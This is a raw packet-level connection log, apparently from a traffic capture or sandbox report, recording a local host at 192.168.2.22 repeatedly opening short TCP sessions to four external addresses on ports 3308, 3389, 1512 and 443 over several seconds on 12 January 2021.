Jan 12, 2021 01:44:23.393441916 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.405577898 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.405615091 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.405739069 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.405777931 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.420263052 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.465589046 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.465863943 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.476394892 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.476788998 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.519987106 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.520287991 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.559614897 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.563575983 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.563627005 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.676896095 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.676938057 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.677194118 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.682862997 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:23.725999117 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:23.804512978 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:23.858253002 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:23.858395100 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:23.860127926 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:23.914127111 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:23.953654051 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:23.953694105 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:23.953794956 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:23.965581894 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.019011974 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.025278091 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.025501966 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.034816980 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.034995079 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.088603020 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.088968992 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.128269911 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.143362045 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.143400908 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.233494043 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.233545065 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.233633995 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.233690023 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.239257097 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:24.292860031 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:24.351583004 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.404503107 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.404716015 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.406292915 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.459103107 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.465976000 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.466017008 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.466120005 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.468911886 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.480561018 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.534550905 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.534802914 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.549989939 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.550340891 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.603168964 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.603434086 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.642203093 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.656407118 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.754400015 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.754442930 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.754708052 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.760288954 CET	49210	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:24.813141108 CET	1512	49210	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:24.881618023 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:24.933959007 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:24.934106112 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:24.935823917 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:24.987874985 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.002497911 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.002638102 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.018779993 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.073440075 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.073767900 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.084219933 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.084583998 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.136744022 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.137049913 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.189421892 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.308095932 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.308139086 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.308216095 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.308269978 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.312427998 CET	49211	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:25.364489079 CET	443	49211	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:25.427045107 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.470321894 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.470510006 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.472045898 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.515135050 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.530735970 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.530771971 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.530931950 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.546025991 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.591582060 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.591821909 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.602013111 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.602319002 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.645410061 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.645662069 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.685642958 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.688939095 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.688992977 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.802390099 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.802432060 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.802668095 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.808259964 CET	49212	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:25.851538897 CET	3308	49212	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:25.925901890 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:25.979938984 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:25.980077982 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:25.981698990 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.035409927 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.056874990 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.056915045 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.057004929 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.057051897 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.069132090 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.129213095 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.129544973 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.139303923 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.139489889 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.193315029 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.193747997 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.232800961 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.247448921 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.247502089 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.338602066 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.338644028 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.338866949 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.344566107 CET	49213	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:26.398277998 CET	3389	49213	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:26.456618071 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.509695053 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.509818077 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.511348963 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.564243078 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.571059942 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.571094036 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.571165085 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.571214914 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.585829973 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.640037060 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.640268087 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.650125980 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.650208950 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.703448057 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.703744888 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.742516041 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.756927967 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.858053923 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.858098984 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.858342886 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.863998890 CET	49214	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:26.917129993 CET	1512	49214	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:26.987023115 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.039442062 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.039565086 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.041400909 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.093487978 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.108376980 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.108479023 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.126348019 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.180978060 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.181427956 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.192498922 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.192687035 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.244927883 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.245222092 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.297606945 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.414380074 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.414449930 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.414598942 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.420330048 CET	49215	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:27.472632885 CET	443	49215	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:27.533516884 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.576715946 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.576893091 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.578447104 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.621476889 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.632952929 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.632987976 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.633107901 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.633167028 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.641755104 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.686647892 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.686805964 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.693530083 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.693737030 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.736789942 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.736929893 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.777456999 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.780164003 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.780209064 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.893381119 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.893464088 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:27.893691063 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.899353981 CET	49216	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:27.942776918 CET	3308	49216	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:28.016834021 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.070561886 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.070744038 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.072417974 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.125999928 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.141500950 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.141537905 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.141664028 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.141710997 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.158673048 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.219197035 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.219569921 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.229715109 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.229939938 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.283734083 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.284002066 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.322662115 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.337909937 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.337943077 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.427973986 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.428020000 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.428428888 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.433928967 CET	49217	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:28.487622976 CET	3389	49217	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:28.547010899 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.600167036 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.600306988 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.602035999 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.654839039 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.661704063 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.661744118 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.661901951 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.662319899 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.676001072 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.730012894 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.730341911 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.740268946 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.740614891 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.793579102 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.793939114 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.830338001 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.846887112 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.846929073 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.950037956 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.950083017 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:28.950342894 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:28.952231884 CET	49218	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:29.005208969 CET	1512	49218	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:29.062199116 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.114712954 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.114938021 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.116573095 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.168716908 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.176541090 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.176661015 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.193849087 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.248653889 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.248946905 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.259368896 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.259716988 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.312191010 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.312587976 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.365125895 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.483617067 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.483655930 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.483946085 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.489495993 CET	49219	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:29.541825056 CET	443	49219	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:29.607878923 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.651215076 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.651412964 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.652983904 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.696130991 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.707201004 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.707237005 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.707307100 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.707324982 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.723560095 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.768755913 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.768996954 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.779153109 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.779434919 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.822645903 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.822971106 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.863405943 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.866110086 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.977770090 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.977818012 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:29.977874994 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.978247881 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:29.980710030 CET	49220	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:30.023715973 CET	3308	49220	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:30.091583014 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.145030975 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.145160913 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.146910906 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.199970007 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.215451956 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.215487003 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.215544939 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.215596914 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.230042934 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.289632082 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.289866924 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.299897909 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.300025940 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.353682041 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.353960991 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.393292904 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.407227039 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.407279015 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.498286963 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.498352051 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.498564005 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.502743006 CET	49221	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:30.556618929 CET	3389	49221	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:30.620129108 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.672996044 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.673181057 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.674894094 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.727544069 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.737642050 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.737678051 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.737826109 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.745522022 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.799377918 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.799556017 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.807569027 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.807651043 CET	49222	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:30.864705086 CET	1512	49222	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:30.864866972 CET	49222	1512	192.168.2.22	46.105.131.65
